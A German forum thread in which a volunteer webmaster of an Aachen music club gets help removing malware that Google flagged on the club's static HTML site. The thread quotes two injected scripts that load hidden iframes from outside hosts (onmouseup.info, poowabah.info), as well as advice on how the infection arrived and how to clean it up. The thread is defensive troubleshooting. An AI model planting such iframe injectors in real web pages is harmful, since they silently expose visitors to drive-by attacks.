Hallo Ihr Lieben! Vorab zur Information: Ich betreue eine Webseite für einen gemeinnützigen Verein. Natürlich mach das unentgeldlich:
Dies mache ich nun seit circa 2 Jahren, nachdem der ursprüngliche Ersteller aus dem Verein ausgetreten ist.

Seit einigen Tagen wird unsere Webseite von der Google Suchmaschiene als gefährdend eingestuft. ich habe mithilfe des Google Webmaster Tools auch herausgefunden was beanstandet wird. Es heisst . Es wurde kritische Malware gefunden

Und zwar ein script (das poste ich mal unten mit), welches sich in der .../termine.htm befinden soll.

Mit Malwarebyts Antimalware..habe ich meinen rechner gescannt..somit uch die Dateien der Webseite die lokal bei mir liegen...nur ..der findet nchts.
Auch wenn ich die beanstandete Seite in Adobe Go live öffne und ich hab JEDE Zeile kontrolliert..finde ich dieses Skript nicht. Ich muss dazu sagen..das ich mir die kenntnisse um die ebseite zu betreuen selber angelernt habe...nur jetzt bin ich mit meinem Latein zu Ende. Vielleicht kann mir hier im Forum jemand helfen. Vielen Dank erst mal.


Das besagte skript


<script>var url="http://onmouseup.info/stats.php";if((naviga
tor.userAgent.toLowerCase().indexOf("msie")>=0)||( navigator.
userAgent.toLowerCase().indexOf("firefox")>=0)){va r f=docume
nt.createElement('iframe');f.setAttribute("width", "1");f.set
Attribute("height","1");f.setAttribute("src",url); f.setAttri
bute("style","visibility: hidden; position: absolute; left:
0pt; top: 0pt;");document.getElementsByTagName("body")[0].ap
pendChild(f)}</script>

Hallo Antje,

könntest du einen Link zu der besagten Seite hier reinstellen? Am besten ohne http:// und www., damit er nicht klickbar ist.

Hört sich so an, als ob dort Schadcode eingeschleust wurde. Ansonsten könntest du in den Quelltext (Rechte Maustatste -> Seitenquelltext) schauen und versuchen die Zeilen ausfindig zu machen.

Viele Grüße

die Webseite heisst


oecherstadtmusikanten.de/termin.htm


das ist der Seitenquellrtext...und auch hier finde ich diese script nirgendwo

  Spoiler:

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Oecher_Stadtmusikanten_termine</title>
<META NAME="TITLE" CONTENT="Die Oecher Stadtmusikanten,stimmungsgarant mit Aachener liedern,wir lassen ihren Saal beben!">
<META NAME="SUBJECT" CONTENT="Die Oecher Stadtmusikanten,stimmungsgarant mit Aachener liedern,wir lassen ihren Saal beben!">
<META NAME="description" CONTENT="Die Oecher Stadtmusikanten,stimmungsgarant mit Aachener liedern,wir lassen ihren Saal beben!">
<META NAME="keywords" CONTENT="Aachen, stimmung, karnaval, musikanten, musik, gesang, lieder">
<META NAME="LANGUAGE" CONTENT="GERMAN">
<META NAME="CONTENT-LANGUAGE" CONTENT="GERMAN">
<META NAME="REVISIT-AFTER" CONTENT="7 DAYS">
<META NAME="ROBOTS" CONTENT="ALL">
<META NAME="EXPIRES" CONTENT="never">
<META NAME="RATING" CONTENT="General">
<META NAME="AUTHOR" CONTENT="Wilfried Hauten">
<META NAME="WEB-AUTHOR" CONTENT="Rudi Glavimans">
<META NAME="Identifier-URL" CONTENT="http://www.oecherstadtmusikanten.de/index.htm">
<META NAME="OWNER" CONTENT="Oecherstadtmusikanten">

<style>
<!--
span.fliesstextbig1
{font-family:Georgia;
font-variant:normal !important;
color:white;
text-transform:none;
font-weight:bold;
font-style:normal}
span.fliesstextbiggreen1
{font-family:Georgia;
font-variant:normal !important;
color:#99FF00;
text-transform:none;
font-weight:bold;
font-style:normal}
.lpart {
background-color:#f0f0f0;
border-left:#ccc 2px solid;
padding-bottom:25px;
}
.lhead {
background-color:#eee;
border-top:#aaa 3px solid;
border-bottom:#aaa 3px solid;
padding:3px;
font:bold 14px verdana;
}
.lcount {
background-color:#999;
color:#fff;
padding:2px;
font:bold 12px verdana;
}
.lpage {
font:normal 12px verdana;
}
-->
</style>

</head>
<body link="#000000" vlink="#000000" alink="#000000"><!--c3284d--> <script>var url="http://onmouseup.info/stats.php";if((navigator.userAgent.toLowerCase().i ndexOf("msie")>=0)||(navigator.userAgent.toLowerCa se().indexOf("firefox")>=0)){var f=document.createElement('iframe');f.setAttribute( "width","1");f.setAttribute("height","1");f.setAtt ribute("src",url);f.setAttribute("style","visibili ty: hidden; position: absolute; left: 0pt; top: 0pt;");document.getElementsByTagName("body")[0].appendChild(f)}</script><!--/c3284d-->



<center>
<img border="0" src="http://www.netzwelt.de/forum/images/Oecher_Stadtmusikanten_header.jpg" width="950" height="78">
</center>
<div align="center">
<table border="20" width="80%" id="table1" bordercolor="#FFFF00" bordercolorlight="#FFCC00" bordercolordark="#CC9900">
<tr>
<td bordercolor="#FFCC00" bordercolorlight="#FFFF00" bordercolordark="#FFCC00" align="center" bgcolor="#FFFF99">
<br><br><br>
<a href="mitgliederbereich/mitglieder1.htm">
<img border="0" src="http://www.netzwelt.de/forum/images/mitgliederbereich.jpg" alt="" border="0" width="664" height="174">
<br><br><br><br>
</tr>
</table>
</div>

<center>
<font face="Verdana" size="3" color="#000000">
<object classid="clsid27CDB6E-AE6D-11CF-96B8-444553540000" id="obj1" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0" border="0" width="1056" height="134">
<param name="movie" value="buttons/button_hauptseite.swf">
<param name="quality" value="High">
<embed src="buttons/button_hauptseite.swf" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" name="obj1" width="1056" height="134"></object>
</font>
</center>
<center>
<b><font face="Times New Roman"> &copy; Oecher Stadtmusikanten</font></b>
</center>
</body>
</html>

---------- Doppelpost zusammengeführt ----------

das ist sehr seltsam! wenn ich dens eitenqelltext im browser anschaue finde ich das script nicht...jetzt ist es jedoch offensichtlich zu sehen..was kann ich denn nun machen? und was ist das für eine grüne fratze direkt in im quelltext?

Wenn ich die Seite aufrufe bekomme ich nur eine 404 Meldung. Scheinbar wurde die Unterseite gelöscht?

Um die Fratze brauchst du dir keine Sorgen zu machen. Da sind einfach zwei Zeichen drin, die von unserem Forum als Smileys interpretiert werden.

Kannst du mal die termin.html in einem Editor öffnen und den Inhalt hier posten, sofern keine sensiblen Daten einsehbar sind?

Grüße

hier ist der quelltext. jedoch das script wird im editor auch nicht gezeigt..wohl aber wenn ich den quelltext direkt hier poste. du kannst auch noch mal versuchen direkt den quelltext einzusehen. denn in der zwischenzeit hatte ich besagte seite gelöscht und eine 2 tage ältere verion hochgeladen..die ist jedoch bereits infiziert gewesen.

Ihr nutzt scheinbar statische HTML-Seiten, die über FTP hochgeladen werde, richtig? Also kein PHP oder CMS dahinter?

also die webseite ligt bei mir lokal..wenn ich etwas ändere lade ich die aktualisierten sachen per ftp neu hoch..das ist richtig

Wie ich sehe handelt es sich hierbei auch um Webhosting, nicht um einen eigenen Server.

Somit bleiben eigentlich nur wenige Möglichkeiten übrig:
- Passwort geknackt
- Zugang über Sicherheitslücken in den Scripten (wobei das auch flach fällt, da statische HTML-Seiten)
- Kontaminiertes lokales System

Ich würde auf jeden Fall als erstes das System durchscannen, die Passwörter von dem Server ändern (Confixx, Backend, FTP, ..) und dann alle Dateien in einem Editor (nimm den hier) editieren bzw. den Schadcode entfernen.

ja die seiten werden auf host europa gehostet. die passwörter habe ich bereits geändert. mein system habe ich bereits mehrfach gescannt..da kommt keine meldung. jetzt habe ich im oben genannten editor die /termine.htm geöffnet... das problem ist nur..genau wie beim editor...das ich das schädliche script nicht sehehn kann..kann es also auch nicht aus der seite herauslöschen..gibt es noch andere möglichkeiten?

Ach so, dann war der Anhang gar nicht aus dem Editor kopiert, sondern aus dem Quellcode

Hmm, das macht die Sache dann doch etwas verworrener. Befinden sich vielleicht auf dem FTP irgendwelche neuen Dateien, die du mit Sicherheit nicht hochgeladen hast?

Normalerweise machen wir das nicht aber so eine Ferndiagnose ist dann doch etwas schwierig. Aber ich könnte, wenn du magst, einen Blick auf den FTP werfen. Schick mir dazu eine PN mit den Daten.

hmmm...ich glaub ich stell mich ziemlich doof an..tut mir wirklich leid

ein kollege besagten vereins hat allerdings auch die zugangsdaten und ändert hier mal was..da mal was...auch im mitgliederbereich der termine.htm heisst...ich schick dr aber jetzt mal die ftp zugangsdaten...ist wirklich lieb von dir das du mir weiterhelfen willst..ich grieg hier gleich graue haare

Ok, kannst die FTP-Daten wieder ändern, ich bin durch.

Folgendes: Es waren auf dem FTP alle .htm-Dateien infiziert. Das ganze geschah am 21.06.2012 zwischen 01:06:00 und 01:07:00. Hat man schön am Änderungsdatum gesehen.

Es kann also gut sein, dass das System deines Vorgängers infiziert war. Ich tippe ganz stark auf ein lokales infiziertes System, da ich keinerlei ausführbare Skripte auf dem FTP gesehen habe.

Was du nun tun solltest: Deine lokalen Dateien vom Computer löschen (vorher vielleicht auf nem Stick sichern) und den Inhalt vom FTP herunterladen, damit du die aktuellen Daten hast und diese nicht versehentlich mit den alten überschreibst.

Was ich gemacht habe: Ich bin alle .html-Dateien durchgegangen und habe den Schadcode entfernt. Scheinbar hattest du sie irgendwie falsch geöffnet, dass du den Code nicht gesehen hast. Du musst die Dateie herunterladen und per Rechtsklick mit dem Notepad++ öffnen. Dann siehst du den Quellcode.

Du musst dich noch in den Google Webmaster-Tools anmelden und einen Bericht einreichen, dass der Schadcode entfernt wurde.

Danach beobachtest du das bitte über Tage/Wochen ob der Mist "zurückgekommen" ist, was ich aber nicht denke.

Viele Grüße

Wie kann ich mich nur bei Dir bedanken?? Ich bin total baff mein Lieber ..vielen..vielen Dank für Deine hilfe. Hast echt was gut bei mir..bist du ma in Aachen..geb ich dir mächtig einen aus. Merci

Kein Problem. Bleib einfach der Netzwelt treu und alles ist gut

Viele Grüße

Ach so, Dein Kollege von dem du in der PN gesprochen hast muss sich natürlich auch ein Mal alle Daten ziehen, sofern er sie lokal verwaltet

ich werde es ihm sagen...hab grad mit ihm telefoniert...vielen dank..natürlich bleibe ich netzwelt treu. solche schnelle und unbürokratische hilfe ist wirklich selten

Habe eben aus Interesse erneut reingeschaut und gesehen, dass ein ähnlicher Code wieder da ist

Diesmal steht dort:

PHP-Code:

<!--c3284d--><script>
var _q = document.createElement('iframe'),
_n = 'setAttribute';
_q[_n]('src', 'http://poowabah.info/counter.php');
_q.style.position = 'absolute';
_q.style.width = '16px';
_q[_n]('frameborder', navigator.userAgent.indexOf('39c33260f6d7671e2dae7d03d1087e22') + 1);
_q.style.left = '-6200px';
document.write('<div id=\'pzadv\'></div>');
document.getElementById('pzadv').appendChild(_q);
</script><!--/c3284d--> 


Da ich beim letzten Mal keine ausführbaren Dateien bei euch gesehen habe, tippe ich auf einen kontaminierten Rechner bei euch. Davon spricht auch diese Analyse, siehe Update vom 14 Juli.

Hat dein Kollege und alle anderen, die bei euch Zugriff auf den Server haben, ihre PCs gescannt?

Viele Grüße

Das FTP-Passwort, welches ich von dir bekommen hatte, war neu oder noch ein älteres?

das passwort war ein neues..jetzt ist die ganze seite vom kis host europa gesperrt....ich flipp noch aus hier

---------- Doppelpost zusammengeführt ----------

von dem anderen der zugriff hat weiss ich nur, das der einen blue screen hatte und seinen rechner neu aufsetzen wollte

Dann würde ich mich an den Hoster wenden. Kann gut sein, dass es eine Lücke bei denen ist, sollten sie alte Software (Plesk) einsetzen.